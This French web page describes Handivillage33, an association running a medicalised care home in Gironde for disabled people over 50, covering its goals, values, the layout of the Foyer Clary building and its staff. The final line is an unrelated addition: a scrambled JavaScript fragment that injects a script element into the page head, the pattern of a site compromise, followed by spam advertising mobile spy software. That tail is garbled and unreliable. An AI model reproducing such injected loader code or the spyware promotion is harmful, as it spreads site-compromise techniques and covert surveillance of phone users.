Une réponse aux droits fondamentaux

A une époque où l’âge, alourdi du handicap, rend les personnes très dépendantes mais aussi socialement inexistantes, le «pari» proposé par Handivillage33 est réussi.

Solidarité, humanisme, décloisonnement, pluridisciplinarité, accompagnement, sont les termes qui peuvent le plus aisément caractériser l’action menée.

C’est un combat pour l’égalité des droits, des chances et de la citoyenneté des personnes atteintes de handicaps divers où les problèmes rencontrés par l’un ou l’autre concernent l’ensemble du groupe, en une conduite solidaire de tous les instants.

Handivillage33 s’inscrit comme un lieu expérimental où chacun retrouve confiance en soi et dignité.

Quelques mois après l’ouverture au public de son Foyer d’Accueil Médicalisé, «l’expérience» Handivillage33 est réussie :

  • 60 personnes handicapées de plus de 50 ans sont accueillies depuis février 2010,

  • Plus d’une centaine d’emplois ont été créés,

  • Des résultats d’intégration à la vie mesurables et probants

  • Un lieu d’accueil pour des personnes accidentées de la vie qui reprennent place progressivement dans la société.

Une réponse associative performante à un problème majeur de santé publique

L’association Handivillage33 a pour objectifs de répondre au manque de dispositifs adaptés pour les personnes handicapées vieillissantes, notamment en Gironde, dans le cadre de la loi du 11 février 2005.

L’Association a pour buts de :

  • Contribuer à fournir des réponses aux différents problèmes que rencontrent les personnes handicapées, (infirmes moteurs cérébraux, handicapés psychiques, traumatisés crâniens, cérébro-lésés, personnes atteintes de déficiences générales) et leurs familles du fait de leur vieillissement mais disposant d’une capacité suffisante pour une vie en collectivité.
  • Créer et de gérer un centre d’hébergement, de vie, de soins et d’activités pour adultes handicapés vieillissants qui pourront y séjourner de façon permanente ou temporaire.
  • Fournir l’assistance nécessitée par les degrés d’invalidité des résidents dans toutes les situations essentielles de la vie quotidienne, notamment pour la sécurité physique, la toilette, l’habillement, la restauration, les loisirs, les déplacements, les visites, l’information des parents et des tuteurs,…
  • Promouvoir toutes les actions susceptibles de favoriser la vie des résidents et de prendre toutes initiatives, démarches et recherches de conventionnement, qui permettront de conforter ou développer les buts et les moyens de l’Association.

Le Foyer d’Accueil Médicalisé d’Handivillage 33 se veut donc être un lieu d’hébergement, de soins et d’activités pour les personnes handicapées vieillissantes. La dénomination même de ce projet, innovant et expérimental, laisse apparaître les grandes valeurs qui guident l’ensemble des actions, que ce soit en termes de projet de soins ou d’accompagnement, à savoir :

  • La mixité des handicaps sous tendue par les principes d’entraide et de solidarité,
  • la double prise en charge Handicap / Vieillissement,
  • l’activité comme support à la revalorisation de soi et à l’investissement personnel,
  • la démarche qualité et l’évaluation qualité,
  • la démarche palliative d’accompagnement,
  • l’expérimentation d’aide aux aidants.

Ce lieu de vie fonctionnant 24h/24, 365 jours par an, permet aux adultes handicapés à partir de 50 ans et qui le désirent, de continuer à vivre dans ce lieu si leur état de santé le permet et si possible jusqu’au terme de leur vie, selon les compétences du Foyer.

La construction du Foyer Clary a pris en compte le projet de lieu de vie ouvert, accueillant une population aux handicaps variés, favorisant rencontres et mixité.

Reliés au cœur que forme la salle à manger, 4 « pétales », unités spacieuses, reçoivent chacun un type de handicap.

Pour chacune des unités les 15 chambres, réparties de part et d’autre d’un espace de convivialité, ont une superficie de 26m2 qui favorise l’aménagement individualisé, la circulation en fauteuil roulant, la réception des familles ou des amis.

L’espace soin est central, accessible. La salle de soin et la pharmacie sont contigus aux bureaux de la cadre de santé, du médecin, de la psychologue, de l’assistante sociale et de la responsable hôtelière, ainsi qu’à la salle de rééducation et la balnéothérapie.

La salle à manger est spacieuse, suffisamment insonorisée pour pouvoir accueillir en toute quiétude l’ensemble des résidents et les personnels dans l’esprit de rencontre, de partage, de mixité. Elle se prolonge par une petite salle de restaurant dite « des invités », dans laquelle le résident peut prendre son repas avec sa famille de façon plus intime.

Dans chaque pétale, les salles d’activités permettent les échanges entre résidents de pétales différents autour d’animations variées.  Une médiathèque, un espace snoezelen, une bibliothèque, un jardin et un atelier complètent cet équipement collectif. Le salon d’esthétique, très investi autant par les femmes que par les hommes, est aussi un lieu de rencontre.

Parce que le besoin de logements concerne toutes les catégories de population, Aquitanis, Office Public de l’Habitat de la Communauté Urbaine de Bordeaux, met son savoir-faire au service de collectivités ou d’organismes spécialisés pour la réalisation de programmes spécifiques. Aquitanis a été le Maître d’Ouvrage du bâtiment. Il en est maintenant propriétaire.

Le Foyer CLARY d’Handivillage 33, c’est aujourd’hui un bâtiment de 6 700 m2, une équipe de plus de 100 personnes qui accueillent 60 résidents bien intégrés, bien soignés, souvent en progrès, qui vivent ensemble, répondant tout naturellement au souci de mixité et de solidarité du projet associatif.

Haut d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’); if (document.currentScript) { The most popular 2017 spy software applications for the mobile phones.